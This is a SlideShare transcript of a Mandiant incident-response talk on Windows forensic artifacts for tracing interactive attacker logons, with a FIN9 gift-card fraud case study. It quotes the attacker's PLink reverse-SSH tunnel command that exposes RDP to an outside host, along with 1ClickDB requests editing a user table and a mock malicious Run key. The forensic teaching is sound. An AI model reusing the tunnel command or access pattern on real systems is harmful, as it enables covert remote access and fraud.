SlideShare a Scribd company logo

Kealy OWASP interactive_artifacts

F
Frank Victory

The document discusses the use of interactive artifacts to track attacker actions during forensic investigations, highlighting methods to define interactive logon sessions and the significance of various forensic artifacts. It includes a case study detailing a financially motivated attack (Fin9) that exploited business processes, alongside examples of log entries and user activity evidence. The presentation emphasizes the analysis of user profiles, registry keys, and remote desktop events, ultimately aiming to demonstrate how multiple evidence sources can unveil intricate stories in cyber investigations.

Technology
Related topics:
Digital Forensics
1 of 55
Downloaded 27 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
1 Using Interactive Artifacts to Track Attacker Actions § Phillip Kealy
2 Overview § Background § Disclaimer § Presentation Goals § Interactive Artifact Overview § Case Study + Interactive Artifacts § Scaling Investigations using Interactive Artifacts
3 Background § Who am I? § Career - Operational - CIRT - Security Manager - Consulting
4 DISCLAIMER Case studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers. In many cases, facts have been changed to obscure the identity of our customers and individuals associated with our customers.
5 Presentation Goals § Define Methods for Interactive Logons § Provide overview of available artifacts § Methods to use multiple evidence sources to provide in-depth story
6 What are Interactive artifacts? § Forensic Artifacts that record user activity during an interactive logon session § Examples of interactive logon sessions: - Physically at the keyboard - Remote Desktop - Third Party Utilities • Screen Connect • VNC • More - PsExec
7 User Profiles What happens upon a user’s first interactive user logon? § Log Entries (More on this shortly) § Creation of user profile - “C:users%USERNAME%” - User registry hives § A user profile can prove an interactive logon occurred, even without event log evidence RDP frank ITJumpServer “C:usersfrank*” created
8 Case Study – FIN9 § Financially Motivated Attacker § Uses minimal malware for initial access and to maintain presence § Exploits business processes and systems for financial gain
9 Targeted Attack Lifecycle – FIN9 • Phishing Email • Word document with macros • Netwire • TeamViewer • ScreenConnect • EMCO • Dameware • NanoCore • MimiKatz • Keystroke logging • Fake Logon Screen • Sticky Keys • Built-in Windows Utilities • Net commands • File shares • Search for systems of interest • Legitimate Access to apps • Direct DB access using 1ClickDB • Remote Desktop • File Shares • Netwire • TeamViewer • ScreenConnect • EMCO • SoftTokenCertificate theft
10 Wipro + Brian Krebs
11 Initial Lead § Fraud Department located Unauthorized Gift Cards issued on January 22, 209 § Suspicious rewards Database interaction on January 22, 2019 traced back to WebServerA § Live response analysis indicated attacker installed 1ClickDB via a remote desktop logon session on WebServerA using Domain Admin account Frank - RDP session to install 1ClickDB occurred on January 19, 2019 between 03:44:56 UTC and 04:55:56 UTC from a system at an unknown IP address § IIS web server logs on WebServerA recorded access to 1ClickDB from the IP address of ITJumpServer - Connections to 1ClickDB webpage occurred on January 22, 2019 between 01:45:33 UTC and 02:30:12 UTC § Now what? - Live response analysis of WebServerA
12 Windows Logon Events Type 2 – Interactive - Physical console - Screen sharing - “RunAs” - PsExec Type 10 – Remote Interactive - Remote Desktop / Terminal Services Type 7 – Credentials used to unlock screen Type 12 – Cached remote interactive Type 13 – Cached unlock
13 Type 10 Logon – RDP Unknown System An account was successfully logged on. User Name: franktheadmin Domain: Rewards Logon ID: (0x0,0x151F248) Logon Type: 10 Logon Process: User32 Authentication Package: Negotiate Workstation Name: ITJumpServer Source Network Address: 192.168.1.101 RDP “Rewards” Domain Controller Security Event Log EID 4624 ITJumpServer
14 RDP Event Logs Microsoft-Windows-TerminalServices-RemoteconnectionManager/Operational Date & Time EID Message 2019-01-22 01:33:23 1149 Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23 21 Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 02:39:45 23 Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45 24 Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101
15 User Registry Hives Users<username> Windows Vista/2008+ NTUSER.DAT HKEY_USERS<User SID>_Classes HKEY_USERS<User SID> Users<username>AppDataLocalMicrosoftWindows Windows Vista/2008+ USRCLASS.DAT Registry Hive PathsRegistry Files on Disk
16 LNK Files § Windows shortcut files § Auto-generated when file opened in Explorer § Supports “Recent Files” / “Recent Docs” functionality Windows Vista, 7, Server 2008 – LNK File Paths C:Users%USERNAME%AppDataRoamingMicrosoftWindowsRecent C:Users%USERNAME%AppDataRoamingMicrosoftOfficeRecent
17 Data within LNK Files § Full file path (local or network) § Attributes and logical size § MAC timestamps for the referenced file at the time it was last opened § Output from “lnkparse.py” lnkparse.py - sourceforge.net/projects /jafat/files/lnk-parse/
18 LNK File of interest Date & Time Timestamp File Name 2019-01-22 01:39:23 Created C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk Date & Time Timestamp 2019-01-22 01:36:23 Created, Modified, Accessed C:UsersdaveDesktopresult.txt
19 Most Recently Used (MRU) Keys “RecentDocs” Recently opened files Multiple Subkeys for file types HKEY_USERS{SID}SoftwareMicrosoftWindowsCu rrentVersionExplorerRecentDocs .ini, .pem, .txt, .doc, .rdg, .zip, Folder, etc. § Binary Format § Stores most recent 10 opened files Key Last Write Registry Key Parsed MRU Value 2019-01-22 01:36:23 SoftwareMicrosoftWindowsCurrentVersionExpl orerRecentDocs.txt 0 = result.txt 2019-01-22 01:35:34 SoftwareMicrosoftWindowsCurrentVersionExpl orerRecentDocs.zip 0 = omg.zip
20 Anatomy of a Registry Key Example: Run key Key: HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun Value Name: NotMalware Value Data: C:ProgramDataTotallyMalwareEvil.exe
21 Anatomy of a Registry Key Example: Run key Key Last Modified: 2017-06-05 19:33:51 § Values inherit Last Modified time from their parent key
22 A timestamp is applied to the ‘Key’, and is updated when… 1) Key created 2) Value created/deleted 3) Data of any Value is modified Note: Registry timestamps can be modified, although this is not very common Registry Timestamps
23 Evidence of Execution Default Enabled User Agnostic All Windows Versions Execution Visibility ShimCache Yes Yes Yes Yes AmCache Yes Yes No Yes UserAssist Yes No Yes GUI only MUICache Yes No Yes GUI only Prefetch Workstations only Yes Yes Yes Windows Events No Yes Yes Yes WMI RUA No Yes Yes Yes
24 UserAssist and MUICache Tracks files opened in Windows Explorer HKCU{SID}SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist HKCU{SID}SoftwareMicrosoftWindowsShellNoRoamMUICache UserAssist One value per executable file • ROT13 encoded Number of times each program ran Last execution time MUICache One value per executable file • Clear-text Records “FileDescription” for PE files
25 UserAssist Evidence userassist v.20080726 (NTUSER.DAT) Displays contents of UserAssist Active Desktop key UserAssist (Active Desktop) SoftwareMicrosoftWindowsCurrentVersionExplorerUserAssist{75048700-EF1F-11D0-9888- 006097DEACF9}Count LastWrite Time Fri Jul 29 21:46:41 2011 (UTC) Fri Jul 29 21:46:41 2017 (UTC) UEME_RUNPATH (3) UEME_RUNPATH:C:Program Files7-Zip7zFM.exe (1) Fri Jul 29 21:46:17 2017 (UTC) UEME_RUNPATH:C:Program FilesWindows NTAccessoriesWORDPAD.EXE (1) Fri Jul 29 21:44:45 2017 (UTC) UEME_RUNPIDL:%csidl2%Internet Explorer.lnk (15) UEME_RUNPATH:C:Program FilesInternet ExplorerIEXPLORE.EXE (1) Raw contents of UserAssist key Decoded UserAssist data
26 MUICache Evidence Raw contents of MUICache Key
27 Decoded User Assist Data Key Last Write Registry Key Times Executed 2019-01-22 01:36:23 {1AC14E77-02E7-4E5D-B744- 2EB1AE5198B7}msiexec.exe 1 2019-01-22 01:33:48 {1AC14E77-02E7-4E5D-B744- 2EB1AE5198B7}ServerManager.exe 1 2019-01-22 01:39:23 C:UsersdaveDesktopomg.exe 1 2019-01-22 01:43:23 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 1 2019-01-22 01:44:56 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 1 2019-01-22 02:28:01 {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 3
28 Jump Lists § Provides user quick access to recently used apps § Each user has their own jump lists § Shows evidence of accessed resources § Two types of jump lists § Requires parsing to be human readable - JumpListParser, JLECmd, jmp Automatic %APPDATA%MicrosoftWindowsRecentAutomaticDestinations Custom %APPDATA%MicrosoftWindowsRecentCustomDestinations
29 Jump Lists § Automatic – created automatically when a user interacts with a resource • Custom – created when a user “pins” an item
30 Browser History, Cache, and Downloads § User Specific Artifact § Enumerate Browsers § Extract Browsing History § Collect Browser Cache § Collect Downloaded Files
31 Web Server Side Data - Logging GET vs. POST GET Requests “Retrieve” content specified in the request address Key-value pairs passed as part of URI Fully captured in logs (cs-uri-query) Impact: Malicious activity in POST requests can be hard to detect! POST Requests Tell the server to accept the data enclosed in the packet contents Key-value pairs passed in the message body Request parameters not logged
32 Web Server Side Data - Content Encoding § Special characters in HTTP requests are URL Encoded by the web browser - % followed by ASCII character code - Spaces can be represented by %20 or + http://www.foo.com/search.aspx?name=John & Mark Co.&op=1 …is converted to (and will be logged as)… http://www.foo.com/search.aspx?name= John%20%26%20Mark%20Co.&op=1
33 GET /images/Browse.asp?sqlorderby_A="log_id"+DESC&sqlfrom_A="dbo"."<SYSTEM>_LOG" GET /images/Schema.asp GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?ocdGridMode_A=Se<SYSTEM>h&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A= ("email"+Like+'NAME2@EMAIL.com%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Browse.asp?sqlorderby_A=&sqlwhere_A= ("last_name"+Like+'NAME%')&sqlselecthide_A=&sqlpagesize_A=10&sqlfrom_A="dbo"."<SYSTEM>_USERS" GET /images/Edit.asp?sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS” &sqlorderby_A=&sqlwhere_A=("last_name"+Like+'NAME%')&sqlpagesize_A=10&sqlselecthide_A=&sqlfrom_A="dbo"."<SYSTEM>_U SERS"& GET /images/Connect.asp GET /images/Schema.asp GET /images/Edit.asp?sqlwhere=&sqlid=1989&sqlfrom="dbo"."<SYSTEM>_USERS"&sqlfrom_A="dbo"."<SYSTEM> _USERS"&sqlwhere_A=("email"+Like+'NAME@EMAIL.com%')&sqlpagesize_A=10&sqlorderby_A=&sqlselecthide_A= GET /images/Browse.asp?sqlfrom_A="dbo"."<SYSTEM>_USERS" POST /images/Command.asp?nocache=1/8/2017+12:34:10+PM
34 What do we know so far? Time Source Details 2019-01-22 01:33:23EventLog Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23EventLog Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 01:35:34Registry:LastWrite SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.zip -> omg.zip 2019-01-22 01:39:03LNK:Create Time C:UsersdaveDesktopresults.txt (C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk) 2019-01-22 01:39:23FN:Create Time C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk 2019-01-22 01:39:23Registry:LastWrite SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.txt -> result.txt 2019-01-22 01:39:23UserAssist:Dave C:UsersdaveDesktopomg.exe 2019-01-22 01:43:23UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 2019-01-22 01:44:56UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 2019-01-22 01:45:33IE:BrowserCache Earliest Browser Cache Artifact Created 2019-01-22 02:28:01UserAssist:Dave {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 2019-01-22 02:30:12IE:BrowserCache Most Recent Browser Artifact Modified 2019-01-22 02:39:45EventLog Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45EventLog Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 § What next?
35 Attack Diagram Database Server Web Server Jump Server Unknown System Remote Desktop Web Access 1ClickDB Direct DB Access
36 RDP Event Logs Microsoft-Windows-TerminalServices-RemoteconnectionManager/Operational Date & Time EID Message 2018-12-24 23:11:21 1149 Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2019-01-22 00:23:33 1149 Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1
37 RDP MRU Keys
38 RDP MRU Keys Key Last Write Registry Key 2018-12-25 00:00:23 Hostname: 192.168.1.38 User: rewardsITAdmin 2018-12-25 00:33:42 Hostname: RewardsDB User: rewardsDBO 2019-01-01 02:53:11 Hostname: Webserver2 User: rewardsfrank 2019-01-15 00:15:01 Hostname: ITJumpserver User: rewardsdave
39 RDP Bitmap Cache Files § Store frequently used images used during RDP session § Improves user experience § Located at: - C:Users<username>AppDataLocalMicrosoftTerminal Server ClientCachebcache2.bmc - C:Users<username>AppDataLocalMicrosoftTerminal Server ClientCacheCache[0-9]{4}.bin
40
41 Uninstall or Disable Endpoint Agents
42 Registry Shellbags § Windows Explorer usage § Records size, position, view of windows § Provides evidence of user access to local & remote directories HKEY_USERS{SID}SoftwareMicrosoftWindowsShell HKEY_USERS{SID}SoftwareMicrosoftWindowsShellNoRoam Users<username>AppDataLocalMicrosoftWindows Windows Vista/2008+ USRCLASS.DAT
43 Registry Shellbags Decoded shellbag keys can provide - Paths to directories accessed via Explorer - Date and time at which last access occurred - MAC times of each path tracked in shellbags Decoding tools - RegRipper - shellbags.py github.com/williballenthin/shellbags - ShellBagsExplorer • https://ericzimmerman.github.io/#!index.md
44 ShellBags MRU Time Modified Accessed Created Resource 2019-01-11 03:51:36 2018-12-30 02:59:32 2016-12-30 02:59:32 2017-11-05 14:40:54 My ComputerC:UsersITAdmin [Desktop0043] 2019-01-11 03:51:54 2018-05-07 15:54:36 2016-11-05 14:40:54 2017-11-05 14:40:54 My ComputerC:UsersITAdminAppData [Desktop00430] My Network Placeshqdc1.comhqdc1.comgeneral [Desktop240] 2018-12-25 02:40:59 2012-11-11 17:00:06 2012-11-11 17:00:06 2012-11-11 17:00:06 My Network Placeshqdc1.comhqdc1.comgeneralDC01 [Desktop2400] 2018-12-25 02:40:59 2014-05-23 21:53:24 2018-05-23 21:53:24 2011-04-07 12:28:28 My Network Placeshqdc1.comhqdc1.comgeneralDC01ITIO Server Infrastructure [ 2019-01-12 03:41:41 2017-01-10 14:07:12 2017-01-10 14:07:12 2017-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktop [Desktop290000] 2019-01-12 03:42:22 2017-01-11 18:42:04 2017-01-11 18:42:04 2017-01-10 14:06:56 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopVDI [Desktop2900000] 2019-01-12 03:47:49 2017-01-05 21:37:52 2017-01-05 21:37:52 2017-01-05 20:05:26 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopAD Resumes [Desktop2900001] 2019-01-12 03:41:42 2016-12-18 14:49:14 2016-12-18 14:49:14 2015-01-26 19:43:56 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopMy Impo'tant stuff [Desktop2900002] 2019-01-12 03:53:14 2016-12-15 20:57:58 2016-12-15 20:57:58 2016-11-24 22:18:00 My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopO365 [Desktop2900003] 2019-01-12 03:53:47 2015-09-23 13:52:10 2015-09-23 13:52:10 2016-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankAppData [Desktop290001] 2019-01-11 03:46:21 2016-09-27 13:38:42 2016-09-27 13:38:42 2016-05-02 13:45:42 My Network Places192.168.1.54192.168.1.54c$UsersfrankAppDataRoaming [Desktop2900010]
45 How did the attacker access the host? § Remotely installed ScreenConnect § Switched Tactics and removed ScreenConnect/Installed malware § Non-Interactive malware used to download and execute PLink.exe to create tunnel - tunnel@<IP Address> -pw <Password> -P 443 -2 -4 -T -N -C -R 44489:127.0.0.1:3389 § Connected to local host using remote desktop Key Value Data SoftwareSimonTatham PuTTYSshHostKeys rsa2@<IP Address> 0x10001,0x SSH Public Key
46 Windows 10 Timeline § Timeline exists in Task View - Accessed by hitting Win+Tab § Records timeline of user activity for specific applications § User Engaged § Generic Events § Database location: - C:UsersUserAppDataLocalConnectedDevicesPlatformL.UserActivitiesCache.db
47 Windows Timeline https://cclgroupltd.com/windows-10-timeline-forensic-artefacts/
48 Windows Timeline https://cclgroupltd.com/windows-10-timeline-forensic-artefacts/
49 Windows Timeline § Parsing - Multiple Available Tools • https://tzworks.net/prototype_page.php?proto_id=41 • https://github.com/log2timeline/plaso/pull/2076 • https://ericzimmerman.github.io/#!index.md - SQLite3
50 Windows 10 Timeline Start - UTC End - UTC Application DisplayText or Type Details 2019-02-08 23:04:27N/A WinRARWinRAR.exe sdl-redline.zip Z:Downloadssdl-redline.zip 2019-02-09 01:07:06N/A Cisco.AnyConnect Cisco AnyConnect Secure Mobility Client black 2019-02-10 13:09:53N/A Microsoft.MicrosoftEdge cmd - Bing https://www.bing.com/search?q=cmd&form=WNSGPH http://adaptivecards[.]io/schemas/adaptive-card.json 2019-02-10 13:10:34 2019-02-10 13:10:51Microsoft.MicrosoftEdge UserEngaged https://ericzimmerman.github.io/#!index.md 2019-02-12 13:58:46 2019-02-12 13:58:48Microsoft.MicrosoftEdge UserEngaged https://www.google.com/search?eiadd+on+vpn&oq=add +on+vpn 2019-02-12 13:59:02N/A WiresharkWireshark.exe Wireshark black 2019-02-12 18:57:11N/A WiresharkWireshark.exe 107.x.x.x-10.24.206.133- 1552495684.flow Z:Downloads107.x.x.x-10.24.206.133- 1552495684.flow 2019-02-12 19:02:27N/A WiresharkWireshark.exe 104.x.x.x-10.222.7.44- 1552442420.flow Z:Downloads104.x.x.x-10.222.7.44-1552442420.flow 2019-02-16 00:47:42N/A Microsoft.MSPaint Paint 3D black 2019-02-16 00:50:34N/A Microsoft.MSPaint Picture2.jpg Z:DesktopPicture2.jpg 2019-02-16 03:16:13N/A mspaint.exe Picture1.png Z:PresentationsDFIRPicture1.png 2019-02-16 03:16:56N/A mspaint.exe Picture2.png Z:PresentationsDFIRPicture2.png 2019-02-16 18:41:00N/A WinRARWinRAR.exe 4mXTuLp5E19cNdVvUX9jzb.zip Z:DownloadsTuLp5E19cNdVvUX9jzb.zip 2019-02-16 18:41:33N/A RedlineRedline.exe MBP0074.mans Z:MBP0074.mans
51 Attack Diagram Database Server Web Server Jump Server Conference Room Remote Desktop Web Access 1ClickDB Direct DB Access SSH Tunnel
52 Time Source System Details 2018-12-24 23:11:21EventLog ConfPC Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2018-12-25 00:00:23RDP:MRU ConfPC Hostname:192.168.1.38 User: rewardsITAdmin 2018-12-25 00:33:42RDP:MRU ConfPC Hostname:RewardsDB User: rewardsDBO 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneralDC01 [Desktop2400] 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneralDC01ITIO Server Infrastructure [ 2018-12-25 02:40:59ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankAppData [Desktop290001] 2019-01-01 02:53:11RDP:MRU ConfPC Hostname:Webserver2 User: rewardsfrank 2019-01-11 03:46:21ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankAppDataRoaming [Desktop2900010] 2019-01-11 03:51:36ShellBag:MRU ConfPC My ComputerC:UsersITAdmin [Desktop0043] 2019-01-11 03:51:54ShellBag:MRU ConfPC My ComputerC:UsersITAdminAppData [Desktop00430] 2019-01-12 03:41:41ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktop [Desktop290000] 2019-01-12 03:41:42ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopMy Impo'tant stuff [Desktop2900002] 2019-01-12 03:42:22ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopVDI [Desktop2900000] 2019-01-12 03:47:49ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopAD Resumes [Desktop2900001] 2019-01-12 03:53:14ShellBag:MRU ConfPC My Network Places192.168.1.54192.168.1.54c$UsersfrankDesktopO365 [Desktop2900003] 2019-01-12 03:53:47ShellBag:MRU ConfPC My Network Placeshqdc1.comhqdc1.comgeneral [Desktop240] 2019-01-15 00:15:01RDP:MRU ConfPC Hostname:ITJumpserver User:rewardsdave 2019-01-22 00:23:33EventLog ConfPC Remote Desktop Services: User authentication succeeded: User: ITAdmin Domain: rewards Source Network Address: 127.0.0.1 2019-01-22 01:33:23EventLog Jump Remote Desktop Services: User authentication succeeded: User: dave Domain: rewards Source Network Address: 192.168.1.101 2019-01-22 01:33:23EventLog Jump Remote Desktop Services: Session logon succeeded User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 01:35:34Registry:LastWrite Jump SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.zip -> omg.zip 2019-01-22 01:39:03LNK:Create Time Jump C:UsersdaveDesktopresults.txt (C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk) 2019-01-22 01:39:23FN:Create Time Jump C:UsersdaveAppDataRoamingMicrosoftWindowsRecentresult.txt.lnk 2019-01-22 01:39:23Registry:LastWrite Jump SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs.txt -> result.txt 2019-01-22 01:39:23UserAssist:Dave Jump C:UsersdaveDesktopomg.exe 2019-01-22 01:43:23UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dssite.msc 2019-01-22 01:44:56UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}dsac.exe 2019-01-22 01:45:33IE:BrowserCache Jump Earliest Browser Cache Artifact Created 2019-01-22 02:28:01UserAssist:Dave Jump {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}mstsc.exe 2019-01-22 02:30:12IE:BrowserCache Jump Most Recent Browser Artifact Modified 2019-01-22 02:39:45EventLog Jump Remote Desktop Services: Session logoff succeeded: User: rewardsdave Session ID: 2 2019-01-22 02:39:45EventLog Jump Remote Desktop Services: Session has been disconnected: User: rewardsdave Session ID: 2 Source Network Address: 192.168.1.101 2019-01-22 02:55:45EventLog ConfPC Remote Desktop Services: Session has been disconnected: User: rewardsITAdmin Session ID: 2 Source Network Address: 127.0.0.1
53 Case Study – Expanding View § Shellbags § RDP Logs § RDP Connections § LNK Files § MRU Keys § MuiCache § Jump Lists § RDP Bitmap Cache § SimonTathom Registry Values § Windows 10 Timeline
54 Other fun Artifacts Details Windows Recycler C:$Recycle.Bin<SID> $R<RAND>.<EXT> $I<RAND>.<EXT> Browser History ftp://<AttackerWebsite> file:///C:/Windows/127.0.0.1.pwdump OpenWith Registry Keys SoftwareMicrosoftWindowsCurrentVersionExplorerFileExts .cachedumpOpenWithList .fgdump-logOpenWithList ViClient Logs C:UsersadminAppDataLocalVMwarevpxviclient-#-0000.log
55 Questions Phillip.Kealy@Mandiant.com

More Related Content

PDF
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat Security Conference
 
PPT
Vista Forensics
CTIN
 
PPTX
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
 
PDF
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
PPTX
Splunk n-box-splunk conf-2017
Mohamad Hassan
 
PDF
CNIT 128 3. Attacking iOS Applications (Part 2)
Sam Bowne
 
PPTX
Forensicating windows Artifacts investigation without event logs
Renzon Cruz
 
PDF
CNIT 152 12 Investigating Windows Systems (Part 2)
Sam Bowne
 
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat Security Conference
 
Vista Forensics
CTIN
 
BlueHat v17 || Scaling Incident Response - 5 Keys to Successful Defense at S...
BlueHat Security Conference
 
CNIT 152: 12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
Splunk n-box-splunk conf-2017
Mohamad Hassan
 
CNIT 128 3. Attacking iOS Applications (Part 2)
Sam Bowne
 
Forensicating windows Artifacts investigation without event logs
Renzon Cruz
 
CNIT 152 12 Investigating Windows Systems (Part 2)
Sam Bowne
 

Similar to Kealy OWASP interactive_artifacts (20)

PDF
CNIT 121: 12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
PDF
12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
PDF
CNIT 152: 12b Windows Registry
Sam Bowne
 
PPTX
Windows Event Analysis - Correlation for Investigation
Mahendra Pratap Singh
 
PDF
CNIT 121: 12 Investigating Windows Systems (Part 3)
Sam Bowne
 
PDF
CNIT 152 12. Investigating Windows Systems (Part 3)
Sam Bowne
 
PDF
File000125
Desmond Devendran
 
PDF
Hta f42
SelectedPresentations
 
PDF
DEFCON 23 - Gerard Laygui - forensic artifacts pass the hash att
Felipe Prado
 
PDF
My InfoSec journey led me to create my own IR tools, how, and why you should too
Michael Gough
 
PDF
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
CODE BLUE
 
PDF
Logs, Logs, Logs - What you need to know to catch a thief
Michael Gough
 
PDF
Windows Registry Analysis
Himanshu0734
 
PPT
Chetan-Mining_Digital_Evidence_in_Microsoft_Windows
guest66dc5f
 
PDF
windows-forensics-analysis-v-1.0-4_2.pdf
AmineBesrour
 
PPTX
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Jared Greenhill
 
PDF
Breach > ATT&CK > Osquery: Cross-platform Endpoint Monitoring with Osquery
Uptycs
 
DOCX
10 resource kit remote administration tools
Duggesh Talawar
 
PDF
A_forensic_analysis_of_apt_55lateral.pdf
phailinpsp
 
PPT
Malware forensics
Sameera Amjad
 
CNIT 121: 12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
12 Investigating Windows Systems (Part 2 of 3)
Sam Bowne
 
CNIT 152: 12b Windows Registry
Sam Bowne
 
Windows Event Analysis - Correlation for Investigation
Mahendra Pratap Singh
 
CNIT 121: 12 Investigating Windows Systems (Part 3)
Sam Bowne
 
CNIT 152 12. Investigating Windows Systems (Part 3)
Sam Bowne
 
File000125
Desmond Devendran
 
Hta f42
SelectedPresentations
 
DEFCON 23 - Gerard Laygui - forensic artifacts pass the hash att
Felipe Prado
 
My InfoSec journey led me to create my own IR tools, how, and why you should too
Michael Gough
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
CODE BLUE
 
Logs, Logs, Logs - What you need to know to catch a thief
Michael Gough
 
Windows Registry Analysis
Himanshu0734
 
Chetan-Mining_Digital_Evidence_in_Microsoft_Windows
guest66dc5f
 
windows-forensics-analysis-v-1.0-4_2.pdf
AmineBesrour
 
Memory Forensics for IR - Leveraging Volatility to Hunt Advanced Actors
Jared Greenhill
 
Breach > ATT&CK > Osquery: Cross-platform Endpoint Monitoring with Osquery
Uptycs
 
10 resource kit remote administration tools
Duggesh Talawar
 
A_forensic_analysis_of_apt_55lateral.pdf
phailinpsp
 
Malware forensics
Sameera Amjad
 
Ad

More from Frank Victory (12)

PPTX
Container security Familiar problems in new technology
Frank Victory
 
PPTX
Automation and open source turning the tide on the attackers
Frank Victory
 
PPTX
CNG 256 cloud computing
Frank Victory
 
PPTX
CNG 256 wireless wi-fi and bluetooth
Frank Victory
 
PDF
Differential learning SnowFROC 2017
Frank Victory
 
POTX
Phishing Forensics - SnowFROC - Denver Chapter of OWASP
Frank Victory
 
PPTX
Active defensecombo clean
Frank Victory
 
PPTX
Dns security threats and solutions
Frank Victory
 
PPTX
Cng 125 – chapter 12 network policies
Frank Victory
 
PPTX
Authentication vs authorization
Frank Victory
 
PPTX
9.0 security (2)
Frank Victory
 
PPTX
Lesson 6 web based attacks
Frank Victory
 
Container security Familiar problems in new technology
Frank Victory
 
Automation and open source turning the tide on the attackers
Frank Victory
 
CNG 256 cloud computing
Frank Victory
 
CNG 256 wireless wi-fi and bluetooth
Frank Victory
 
Differential learning SnowFROC 2017
Frank Victory
 
Phishing Forensics - SnowFROC - Denver Chapter of OWASP
Frank Victory
 
Active defensecombo clean
Frank Victory
 
Dns security threats and solutions
Frank Victory
 
Cng 125 – chapter 12 network policies
Frank Victory
 
Authentication vs authorization
Frank Victory
 
9.0 security (2)
Frank Victory
 
Lesson 6 web based attacks
Frank Victory
 
Ad

Recently uploaded (20)

PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PDF
KodekX | Application Modernization Development
KodekX
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PDF
Chapter 3 Spatial Domain Image Processing.pdf
Getnet Tigabie Askale -(GM)
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
